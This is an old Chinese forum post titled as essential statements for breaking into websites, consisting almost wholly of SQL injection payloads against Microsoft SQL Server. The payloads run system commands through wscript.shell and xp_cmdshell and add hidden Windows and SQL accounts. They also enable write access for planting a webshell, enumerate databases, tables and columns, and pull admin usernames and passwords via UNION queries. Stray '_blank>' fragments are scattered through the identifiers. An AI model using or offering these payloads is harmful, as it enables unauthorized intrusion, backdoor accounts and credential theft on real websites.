入侵网站必备(经典语句) |
|
 |
发起人:piaoling 回复数:0 浏览数:6404 最后更新:2009/1/21 14:29:09 by piaoling |
| 选择查看 | 搜索更多相关主题 帖子排序: |
|
piaoling 发表于 2009/1/21 14:29:09
|
|
入侵网站必备(经典语句) 反向PING自己实验
;use master;declare @s int;exec sp_blank>_oacreate "wscript.shell",@s out;exec sp_blank>_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- 加帐号 ;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank> _OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add-- 创建一个虚拟目录E盘: ;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e: \"-- 访问属性:(配合写入一个webshell) declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse 爆库 特殊_blank>技巧::%5c=\ 或者把/和\ 修改%5提交 and 0< >(select top 1 paths from newtable)-- 得到库名(从1到5都是系统的id,6以上才可以判断) and 1=(select name from master.dbo.sysdatabases where dbid=7)-- and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 依次提交 dbid = 7,8,9.... 得到更多的_blank>数据库名 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin and 0 <>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str (id))) 暴到UID的数值假设为18779569 uid=id and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_blank>_id and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in (id,...)) 来暴出其他的字段 and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用户名 依次可以得到_blank>密码。。。。。假设存在user_blank>_id username ,password 等字段 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address)) and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判断id值 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段 ?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin ?id=-1 union select 1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union,access也好用) 得到WEB路径 ;create table [dbo].[swap] ([swappass][char](255));-- and (select top 1 swappass from swap)=1-- ;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE, @key=SYSTEM\CurrentControlSet \Services\W3SVC\Parameters\Virtual Roots\, @value_blank>_name=/, values=@test OUTPUT insert into paths (path) values(@test)-- ;use ku1;-- ;create table cmd (str image);-- 建立image类型的表cmd 存在xp_blank>_cmdshell的测试过程: ;exec master..xp_blank>_cmdshell dir ;exec master.dbo.sp_blank>_addlogin jiaoniang$;-- 加SQL帐号 |
| 返回页首↑ |
津ICP备09000164号联系我们 - piaoling Corporation - 论坛存档 - 返回顶端
Powered by BBSXP 2007 ACCESS © 1998-2025
Server Time 2025/1/14 3:58:42
Processed in 0.02 second(s)